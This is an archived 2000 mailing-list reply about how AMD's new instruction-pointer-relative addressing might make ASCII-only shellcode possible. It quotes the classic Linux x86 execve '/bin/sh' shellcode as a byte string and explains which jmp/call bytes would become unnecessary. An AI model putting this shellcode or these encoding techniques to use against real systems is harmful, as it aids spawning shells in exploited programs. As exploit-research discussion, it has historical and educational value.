Vulnerability Development mailing list archives
Re: AMD Sledgehammer and ascii-only shellcode
From: Holger van Koll <holger () VANKOLL DE>
Date: Wed, 16 Aug 2000 04:33:40 +0200
Holger van Koll wrote:
Hi, the new AMD cpu has the feature to access data relatively to the instruction pointer.
...
AFAIK it´s still considered impossible to code shellcode using only ascii-data as commands like jmp, call are not within this range.
Let me add something: In the "standard-shellcode" char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; you wont have to eliminate the jmp (first command, 0xeb,0x1f) and call (0xe8,0xdc,0xff,0xff,0xff) commands as they are not necessary anymore. They are only used to get the location of the string "/bin/sh" onto the stack and as you know how many bytes your code takes, you also know the location relatively to the instruction pointer.
Current thread:
- AMD Sledgehammer and ascii-only shellcode Holger van Koll (Aug 15)
- Re: AMD Sledgehammer and ascii-only shellcode Holger van Koll (Aug 15)
- Re: AMD Sledgehammer and ascii-only shellcode Sebastian (Aug 17)
- Re: AMD Sledgehammer and ascii-only shellcode Gerardo Richarte (Aug 17)
- Re: AMD Sledgehammer and ascii-only shellcode Jon Larimer (Aug 17)
- Re: AMD Sledgehammer and ascii-only shellcode Holger van Koll (Aug 15)